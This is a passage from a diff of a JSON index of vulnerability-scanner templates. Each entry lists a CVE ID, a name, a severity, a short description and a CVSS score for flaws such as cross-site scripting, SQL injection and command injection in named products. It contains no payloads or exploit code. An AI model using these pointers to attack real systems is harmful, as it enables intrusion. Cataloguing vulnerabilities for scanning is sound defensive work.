2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"} {"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"} -{"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6- SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"} +{"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6 - SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"} {"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"} {"ID":"CVE-2021-37580","Info":{"Name":"Apache ShenYu Admin JWT - Authentication Bypass","Severity":"critical","Description":"Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37580.yaml"} {"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37589.yaml"} @@ -1453,6 +1456,7 @@ {"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-44528.yaml"} {"ID":"CVE-2021-44529","Info":{"Name":"Ivanti EPM Cloud Services Appliance Code Injection","Severity":"critical","Description":"Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44529.yaml"} {"ID":"CVE-2021-44848","Info":{"Name":"Thinfinity VirtualUI User Enumeration","Severity":"medium","Description":"Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-44848.yaml"} +{"ID":"CVE-2021-44910","Info":{"Name":"SpringBlade - Information Leakage","Severity":"high","Description":"SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-44910.yaml"} {"ID":"CVE-2021-45043","Info":{"Name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","Severity":"high","Description":"Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45043.yaml"} {"ID":"CVE-2021-45046","Info":{"Name":"Apache Log4j2 - Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-45046.yaml"} {"ID":"CVE-2021-45092","Info":{"Name":"Thinfinity Iframe Injection","Severity":"critical","Description":"A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the \"vpath\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45092.yaml"} @@ -1477,6 +1481,7 @@ {"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"} {"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"} {"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"} +{"ID":"CVE-2022-0087","Info":{"Name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","Severity":"medium","Description":"On the login page, there is a \"from=\" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0087.yaml"} {"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"} {"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"} {"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"} @@ -1990,6 +1995,7 @@ {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} +{"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"} {"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"} {"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"} {"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"} @@ -2026,6 +2032,7 @@ {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} {"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"} {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} +{"ID":"CVE-2023-26035","Info":{"Name":"ZoneMinder Snapshots - Command Injection","Severity":"critical","Description":"ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras.Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26035.yaml"} {"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"} {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} @@ -2078,6 +2085,7 @@ {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} {"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"} {"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"} +{"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"} {"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"} {"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} {"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} @@ -2102,7 +2110,7 @@ {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} -{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} +{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} {"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} {"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"} @@ -2159,7 +2167,7 @@ {"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"} {"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} -{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"} +{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"} {"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} {"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"} {"ID":"CVE-2023-39109","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39109.yaml"} @@ -2178,12 +2186,15 @@ {"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"} {"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"} {"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"} +{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"} {"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"} {"ID":"CVE-2023-4112","Info":{"Name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4112.yaml"} {"ID":"CVE-2023-4113","Info":{"Name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4113.yaml"} {"ID":"CVE-2023-4114","Info":{"Name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4114.yaml"} {"ID":"CVE-2023-4115","Info":{"Name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4115.yaml"} {"ID":"CVE-2023-4116","Info":{"Name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4116.yaml"} +{"ID":"CVE-2023-41265","Info":{"Name":"Qlik Sense Enterprise - HTTP Request Smuggling","Severity":"critical","Description":"An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-41265.yaml"} +{"ID":"CVE-2023-41266","Info":{"Name":"Qlik Sense Enterprise - Path Traversal","Severity":"medium","Description":"A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-41266.yaml"} {"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"} {"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"} {"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE 